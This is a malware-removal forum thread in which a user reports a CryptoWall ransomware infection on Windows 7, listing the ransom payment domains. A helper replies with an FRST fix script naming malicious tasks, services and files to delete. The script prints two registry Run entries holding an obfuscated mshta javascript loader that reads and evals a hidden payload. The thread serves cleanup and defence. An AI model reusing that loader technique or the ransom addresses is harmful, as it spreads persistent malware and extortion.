Infection with that nasty CryptoWall on Windows 7


simane ernest

Infection with that nasty CryptoWall on Windows 7

by simane ernest »

Hello,

I have a serious CryptoWall problem; here are my 3 reports.

http://pjjoint.malekal.com/files.php?id ... 5u15y58s15
http://pjjoint.malekal.com/files.php?id ... 10h15n6f13
http://pjjoint.malekal.com/files.php?id ... 15w7k5k7q8

CryptoWall via TOR Proxy Domain
ayh2m57ruxjtwyd5.speralreaopio.com ( 95.128.181.13 )
xtpdvz6dnj5nnpe7.onion:8080/decrypt_service_k1f9aj5nfakejr1920mgl57sm1/

Malekal_morte

Re: Infection with that nasty CryptoWall on Windows 7

by Malekal_morte »

Hi,

Your computer is completely infested with Trojans and adware.
In addition, you have two torrent clients running, uTorrent and BitTorrent. Uninstall one of the two.
Also uninstall Lavasoft Web Companion; it is useless.

You have been infected by file-encrypting ransomware.

These mainly arrive through malicious attachments in emails or through web exploits.

There is no real solution for recovering the documents.

Here is the fix to apply with FRST.
You can refer to this explanatory note, which has screenshots to help you: https://www.malekal.com/tutorial-farbar ... -frst/#fix

Open Notepad: Windows key + R, type notepad in the Run field and click OK.
Copy/paste the following into it:

Code:

Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-1-7.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-10_user.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-11.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-3.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-4.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-5.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-5_user.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-7.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\31KF7GHdyOOZkNChPv.job => C:\Users\DONBCI\AppData\Roaming\31KF7GHdyOOZkNChPv.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-1-6.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-1-7.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-10_user.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-11.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-3.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-4.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-5.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-5_user.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-6.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-7.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-6.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-7.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-10_user.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-11.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-3.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-4.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-5.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-5_user.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-6.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-7.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP1.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP2.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP3.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\Crossbrowse.job => C:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe <==== ATTENTION
Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files\globalUpdate\Update\globalupdate.exe <==== ATTENTION
Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files\globalUpdate\Update\globalupdate.exe <==== ATTENTION
HKLM\...\Run: [Advanced File Optimizer] => C:\Program Files\Advanced File Optimizer\AdvancedFileOptimizer.exe -checkscheduledupdate 
 HKLM\...\Run: [ADSKAppManager] => C:\Program Files\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [523144 2015-07-30] (Autodesk Inc.)  
HKLM\...\Run: [**e9429085<*>] => mshta javascript:x6ZVFch4=G99hLJdMB;X8M4=new%20ActiveXObject(WScript.Shell);w1IcP7soUj=fK;vHZ1N=X8M4.RegRead(HKLM\\software\\90239bf8c8\\050e45fd);he1ueLk=7y64FkV;eval(vHZ1N);SzLnvr5xd=zMIu (l'élément de données a 8 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides) 
 HKLM\...\Policies\Explorer\Run: [1025202594] => C:\ProgramData\msnqoirw.exe [87040 2015-06-16] ()  
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1 
HKLM\...\Policies\Explorer: [HideSCAHealth] 1 
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [GoogleChromeAutoLaunch_40617EE6F8FB564AD0CE3B5358FEE19A] => C:\Program Files\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --no-startup-window  
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe [1402640 2015-09-10] (Lavasoft)  
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [GoogleChromeAutoLaunch_02D2960CED9F374CFF98692758B97066] => C:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe --no-startup-window  
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [IZsoft] => C:\Users\DONBCI\AppData\Local\IZsoft\tmpE6F9.exe [188416 2015-09-22] (Mozilla Corporation)  
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [Apworks] => regsvr32.exe C:\Users\DONBCI\AppData\Local\Apworks\hbcpasdq.dll <===== ATTENTION  
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [Eption] => C:\Windows\System32\regsvr32.exe C:\Users\DONBCI\AppData\Local\IZsoft\nndxoczn.dll  
HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [**e9429085<*>] => mshta javascript:B1bU4gtQ=oBgzkX;t1O=new%20ActiveXObject(WScript.Shell);vWCeP1lB=CmmR5;EYr0I5=t1O.RegRead(HKCU\\software\\90239bf8c8\\050e45fd);nC4TCsgrz=ayzy;eval(EYr0I5);L1o4Ukxc=HvZ9Rex1 (l'élément de données a 2 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides) 
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\DONBCI\AppData\Local\IZsoft\lzbhixsg.dllATTENTION! ====> ZeroAccess?  
 ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Pas de fichier  
 ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-09-22] ()  
 Startup: C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\crossbrowse.lnk [2015-09-17]  
 ShortcutTarget: crossbrowse.lnk -> C:\Program Files\Crossbrowse\Crossbrowse\Application\crossbrowse.exe (Pas de fichier)  
Startup: C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML [2015-09-22] () 
Startup: C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG [2015-09-22] () 
Startup: C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT [2015-09-22] () 
InternetURL: C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://ayh2m57ruxjtwyd5.speralreaopio.com/iip7Nf 
GroupPolicy: Restriction - Chrome <======= ATTENTION 
GroupPolicyScripts: Restriction <======= ATTENTION 
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION 
 C:\Users\DONBCI\AppData\Local\IZsoft
CustomCLSID: HKU\S-1-5-21-2230928724-2595705488-1355397441-1005_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\DONBCI\AppData\Local\IZsoft\lzbhixsg.dll ()
 S2 dipubibu; C:\Users\DONBCI\AppData\Local\4C4C4544-1442498897-5110-804E-C7C04F31354A\snsg4AC8.tmp [X] 
 S2 gyvixodu; C:\Program Files\4C4C4544-1442459250-5110-804E-C7C04F31354A\hnswE39D.tmp [X] 
 S2 lehicewu; C:\Program Files\4C4C4544-1442459250-5110-804E-C7C04F31354A\jnslC88C.tmp [X] 
 S2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [X]  
 S2 zokerygi; C:\Program Files\4C4C4544-1442459250-5110-804E-C7C04F31354A\knsuA963.tmp [X] 
 S4 ServiceUpdater; C:\Windows\system32\netupdsrv.exe [191488 2015-09-18] () [Fichier non signé]  
 R2 WdsManPro; C:\ProgramData\eWdsManProe\WdsManPro.exe [451720 2015-09-17] (DTools LIMITED)  
 S2 DGDP56; C:\Users\DONBCI\AppData\Local\Htede\hôte.exe /s [X] 
 S2 globalUpdate; C:\Program Files\globalUpdate\Update\globalupdate.exe [68608 2015-09-17] (globalUpdate) [Fichier non signé] <==== ATTENTION 
 S3 globalUpdatem; C:\Program Files\globalUpdate\Update\globalupdate.exe [68608 2015-09-17] (globalUpdate) [Fichier non signé] <==== ATTENTION 
 R2 LavasoftTcpService; C:\Program Files\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [2751760 2015-09-10] (Lavasoft Limited)  
 S2 NetHttpService; C:\Windows\system32\nethtsrv.exe [350720 2015-09-18] () [Fichier non signé]  
 R2 nowuedctep; C:\Users\DONBCI\AppData\Local\Vaiaholding.exe [77312 2015-09-17] () [Fichier non signé]  
 R1 nethfdrv; C:\Windows\system32\drivers\nethfdrv.sys [40528 2015-07-30] (nethfdrv)  
2015-09-22 08:04 - 2015-09-22 08:04 - 00008628 _____ C:\Users\DONBCI\HELP_DECRYPT.HTML 
 2015-09-22 08:04 - 2015-09-22 08:04 - 00004254 _____ C:\Users\DONBCI\HELP_DECRYPT.TXT  
 2015-09-22 07:53 - 2015-09-22 07:53 - 00008628 _____ C:\Users\DONBCI\AppData\Roaming\HELP_DECRYPT.HTML 
 2015-09-22 07:53 - 2015-09-22 07:53 - 00008628 _____ C:\Users\DONBCI\AppData\HELP_DECRYPT.HTML 
 2015-09-22 07:53 - 2015-09-22 07:53 - 00004254 _____ C:\Users\DONBCI\AppData\Roaming\HELP_DECRYPT.TXT  
 2015-09-22 07:53 - 2015-09-22 07:53 - 00004254 _____ C:\Users\DONBCI\AppData\HELP_DECRYPT.TXT  
 2015-09-22 07:50 - 2015-09-22 07:50 - 00008628 _____ C:\Users\DONBCI\AppData\Local\HELP_DECRYPT.HTML 
 2015-09-22 07:50 - 2015-09-22 07:50 - 00004254 _____ C:\Users\DONBCI\AppData\Local\HELP_DECRYPT.TXT  
 2015-09-22 07:47 - 2015-09-22 07:47 - 00008628 _____ C:\ProgramData\HELP_DECRYPT.HTML 
 2015-09-22 07:47 - 2015-09-22 07:47 - 00004254 _____ C:\ProgramData\HELP_DECRYPT.TXT  
 2015-09-22 07:31 - 2015-09-25 09:16 - 00000000 ____D C:\Users\DONBCI\AppData\Local\Apworks 
 2015-09-22 07:30 - 2015-09-25 09:19 - 00000000 ____D C:\Users\DONBCI\AppData\Local\IZsoft 
 2015-09-22 07:19 - 2015-09-22 07:19 - 28850288 _____ C:\Users\DONBCI\Downloads\vlc-media-player_2-2-1_fr_10829_32.rar  
 2015-09-22 07:17 - 2015-09-22 07:21 - 28849904 _____ C:\Users\DONBCI\Downloads\vlc-media-player_2-2-1_fr_10829_32 
 2015-09-22 05:49 - 2015-09-22 05:49 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\SimpleFiles 
 2015-09-21 17:48 - 2015-09-21 18:20 - 00566696 _____ (MJSHJ) C:\Users\DONBCI\Downloads\Setup.exe  
 2015-09-21 17:42 - 2015-09-21 18:03 - 103542096 _____ C:\Users\DONBCI\Downloads\Film_complet_en_francais_en_qualite_HD_1080p-[www.mksniper.fr]-Premium-DL.rar.jy5xdin.partial 
 2015-09-21 17:34 - 2015-09-21 22:18 - 739246080 _____ C:\Users\DONBCI\Downloads\Film_complet_en_francais_en_qualite_HD_720p-LEGiON.rar  
 2015-09-21 17:06 - 2015-09-21 17:06 - 00014509 _____ C:\Users\DONBCI\Downloads\Film_complet_en_francais_en_qualite_HD_720p-LEGiON.rar (1).torrent 
 2015-09-21 17:03 - 2015-09-22 07:20 - 00014509 _____ C:\Users\DONBCI\Downloads\Film_complet_en_francais_en_qualite_HD_720p-LEGiON.rar.torrent 
 2015-09-19 21:25 - 2015-09-19 21:26 - 01575184 _____ (NCH Software) C:\Users\DONBCI\Downloads\debutsetup.exe  
 2015-09-19 21:07 - 2015-09-19 21:35 - 00000000 ____D C:\Program Files\NCH Software  
 2015-09-19 21:07 - 2015-09-19 21:34 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\NCH Software  
 2015-09-19 21:07 - 2015-09-19 21:33 - 00000000 ____D C:\ProgramData\NCH Software  
 2015-09-19 21:00 - 2015-09-19 21:13 - 00000000 ____D C:\ProgramData\WinZip  
 2015-09-19 12:55 - 2015-09-19 15:01 - 733004602 _____ C:\Users\DONBCI\Downloads\Film_complet_en_francais_HD_TrueFrench 720p- YIFY.zip 
 2015-09-19 00:40 - 2015-03-13 21:07 - 00303616 _____ C:\Users\DONBCI\Desktop\xf-adsk2016_x86.exe  
 2015-09-18 22:19 - 2015-09-18 22:22 - 00000000 ____D C:\ProgramData\Reimage Protector  
 2015-09-18 22:19 - 2015-09-18 22:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair  
 2015-09-18 22:18 - 2015-09-25 09:16 - 00000000 ____D C:\Program Files\Reimage  
 2015-09-18 22:18 - 2015-09-22 09:38 - 00000000 ____D C:\rei 
 2015-09-18 22:11 - 2015-09-22 09:37 - 00000148 _____ C:\Windows\Reimage.ini  
 2015-09-18 21:38 - 2015-09-18 21:39 - 00000000 ____D C:\ProgramData\Google  
 2015-09-18 21:32 - 2015-09-18 21:32 - 00000687 _____ C:\awh46DF.tmp  
 2015-09-18 20:12 - 2015-09-18 20:17 - 00823984 _____ C:\Users\DONBCI\Downloads\XFORCEKeygen3264bits__11652_il119461.exe 
 2015-09-17 16:21 - 2015-09-25 09:16 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\Enigma Software Group  
 2015-09-17 16:20 - 2015-09-17 16:21 - 00000000 ____D C:\sh4ldr 
 2015-09-17 15:35 - 2015-09-17 15:36 - 02077392 _____ (Microsoft Corporation) C:\Users\DONBCI\Downloads\IE11-Windows6.1.exe 
 2015-09-17 15:22 - 2015-09-25 17:22 - 00003128 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-6.job  
 2015-09-17 15:22 - 2015-09-25 15:22 - 00003464 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-7.job  
 2015-09-17 15:22 - 2015-09-25 15:22 - 00002436 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-5_user.job  
 2015-09-17 15:22 - 2015-09-25 15:22 - 00002436 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-5.job  
 2015-09-17 15:21 - 2015-09-25 17:21 - 00005508 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-6.job  
 2015-09-17 15:21 - 2015-09-25 15:21 - 00005508 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-7.job  
 2015-09-17 15:21 - 2015-09-25 15:21 - 00005174 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-11.job  
 2015-09-17 15:21 - 2015-09-25 15:21 - 00004484 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-4.job  
 2015-09-17 15:20 - 2015-09-25 17:20 - 00002102 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-10_user.job  
 2015-09-17 15:20 - 2015-09-25 15:21 - 00004484 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-3.job  
 2015-09-17 15:20 - 2015-09-20 15:23 - 00000364 _____ C:\Windows\Tasks\APSnotifierPP3.job  
 2015-09-17 15:20 - 2015-09-17 17:15 - 00000364 _____ C:\Windows\Tasks\APSnotifierPP2.job  
 2015-09-17 15:20 - 2015-09-17 15:52 - 00000366 _____ C:\Windows\Tasks\APSnotifierPP1.job  
 2015-09-17 15:20 - 2015-09-17 15:20 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnyProtect PC Backup  
 2015-09-17 15:18 - 2015-09-25 15:18 - 00001038 _____ C:\Windows\Tasks\MyBrowser.job  
 2015-09-17 15:18 - 2015-09-25 09:15 - 00000000 ____D C:\Users\DONBCI\AppData\Local\MyBrowser  
 2015-09-17 15:17 - 2015-09-17 15:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyBrowser 
 2015-09-17 15:16 - 2015-09-23 08:50 - 00000000 __SHD C:\Users\DONBCI\AppData\Roaming\AnyProtectEx  
 2015-09-17 15:16 - 2015-09-17 15:16 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsc8F51.tmp 
 2015-09-17 15:13 - 2015-09-17 15:13 - 00000000 ____D C:\ProgramData\eWdsManProe 
 2015-09-17 14:33 - 2015-09-17 14:33 - 00000000 ____D C:\Program Files\OLBPre  
 2015-09-17 14:32 - 2015-09-17 14:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced System~Protector 
 2015-09-17 14:32 - 2015-09-17 14:32 - 00000000 ____D C:\Users\DONBCI\AppData\Local\Systweak  
 2015-09-17 14:32 - 2015-09-17 14:32 - 00000000 ____D C:\ProgramData\Systweak  
 2015-09-17 14:32 - 2015-09-11 15:15 - 00018248 _____ C:\Windows\system32\sasnative32.exe  
 2015-09-17 14:30 - 2015-09-25 09:16 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\istartsurf  
 2015-09-17 14:30 - 2015-09-18 20:02 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\systweak  
 2015-09-17 14:30 - 2015-09-17 14:30 - 00000000 ____D C:\ProgramData\OWdsManProO 
 2015-09-17 14:30 - 2015-07-02 14:14 - 00018200 _____ () C:\Windows\system32\roboot.exe  
 2015-09-17 14:28 - 2015-09-18 22:05 - 00000000 ____D C:\Users\DONBCI\AppData\Local\3496 
 2015-09-17 14:17 - 2015-09-17 14:17 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\mystartsearch  
 2015-09-17 14:17 - 2015-09-17 14:17 - 00000000 ____D C:\ProgramData\aWdsManProa 
 2015-09-17 14:09 - 2015-09-25 14:10 - 00002418 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-5_user.job  
 2015-09-17 14:09 - 2015-09-25 14:10 - 00002418 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-5.job  
 2015-09-17 14:08 - 2015-09-25 17:08 - 00002084 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-10_user.job  
 2015-09-17 14:08 - 2015-09-25 14:10 - 00005156 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-11.job  
 2015-09-17 14:08 - 2015-09-25 14:10 - 00005154 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-7.job  
 2015-09-17 14:08 - 2015-09-25 14:10 - 00004130 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-4.job  
 2015-09-17 14:08 - 2015-09-25 14:10 - 00004130 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-3.job  
 2015-09-17 14:08 - 2015-09-25 14:10 - 00003446 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-1-7.job  
 2015-09-17 14:08 - 2015-09-25 09:17 - 00000000 ____D C:\Program Files\SavePass 1.1  
 2015-09-17 14:08 - 2015-09-23 07:18 - 00000000 ____D C:\Users\DONBCI\AppData\Local\4C4C4544-1442498897-5110-804E-C7C04F31354A 
 2015-09-17 14:08 - 2015-09-17 14:08 - 00000000 ____D C:\Program Files\bae8bc23-98a4-45af-981d-6a8d8526c42d 
 2015-09-17 14:07 - 2015-09-25 09:16 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\VOPackage  
 2015-09-17 14:07 - 2015-09-18 22:25 - 00000000 ____D C:\Program Files\NixSrv 
 2015-09-17 14:07 - 2015-09-17 14:07 - 00077312 _____ C:\Users\DONBCI\AppData\Local\Vaiaholding.exe  
 2015-09-17 14:07 - 2015-09-17 14:07 - 00000187 _____ C:\Users\DONBCI\AppData\Local\Vaiaholding.exe.config  
 2015-09-17 14:07 - 2015-09-17 14:07 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VOPackage  
 2015-09-17 14:04 - 2015-09-25 14:10 - 00001046 _____ C:\Windows\Tasks\Crossbrowse.job 
 2015-09-17 14:04 - 2015-09-25 09:15 - 00000000 ____D C:\Users\DONBCI\AppData\Local\Crossbrowse  
 2015-09-17 14:04 - 2015-09-17 14:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Crossbrowse  
 2015-09-17 14:02 - 2015-09-25 17:02 - 00005502 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-6.job  
 2015-09-17 14:02 - 2015-09-25 17:02 - 00003122 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-1-6.job  
 2015-09-17 14:02 - 2015-09-25 14:10 - 00005166 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-7.job  
 2015-09-17 14:02 - 2015-09-25 14:10 - 00004142 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-4.job  
 2015-09-17 14:02 - 2015-09-25 14:10 - 00003122 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-1-7.job  
 2015-09-17 14:02 - 2015-09-25 14:10 - 00002430 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-5_user.job  
 2015-09-17 14:02 - 2015-09-25 14:10 - 00002430 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-5.job  
 2015-09-17 14:02 - 2015-09-17 14:02 - 00000000 ____D C:\Program Files\c7d7dd19-9990-4ca4-ba57-a64130cd4348 
 2015-09-17 14:01 - 2015-09-25 17:01 - 00002096 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-10_user.job  
 2015-09-17 14:01 - 2015-09-25 15:26 - 00000964 _____ C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job  
 2015-09-17 14:01 - 2015-09-25 15:26 - 00000960 _____ C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job  
 2015-09-17 14:01 - 2015-09-25 14:10 - 00005168 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-11.job  
 2015-09-17 14:01 - 2015-09-25 14:10 - 00004142 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-3.job  
 2015-09-17 14:01 - 2015-09-25 09:16 - 00000000 ____D C:\Program Files\globalUpdate  
 2015-09-17 14:01 - 2015-09-17 14:01 - 00000000 ____D C:\Users\DONBCI\AppData\Local\globalUpdate  
 2015-09-17 13:59 - 2015-09-18 21:30 - 00823984 _____ C:\Users\DONBCI\Documents\XFORCEKeygen3264bits__11652_il119461.exe 
 2015-09-17 12:47 - 2015-09-17 12:47 - 00001970 _____ C:\Users\Public\Desktop\A360 Desktop.lnk 
 2015-09-17 12:26 - 2015-09-17 12:52 - 00000000 ____D C:\Program Files\Common Files\Autodesk Shared  
 2015-09-17 09:50 - 2015-09-17 09:50 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\oursurfing  
 2015-09-17 09:50 - 2015-09-17 09:50 - 00000000 ____D C:\ProgramData\FWdsManProF 
 2015-09-16 22:56 - 2015-09-16 22:56 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsy84C4.tmp 
 2015-09-16 08:46 - 2015-09-16 08:46 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsb293D.tmp 
 2015-09-15 08:36 - 2015-09-15 08:36 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nso7A0E.tmp 
 2015-09-15 08:07 - 2015-09-15 08:07 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsd7C9A.tmp 
 2015-09-14 21:49 - 2015-09-14 21:47 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsy76E2.tmp 
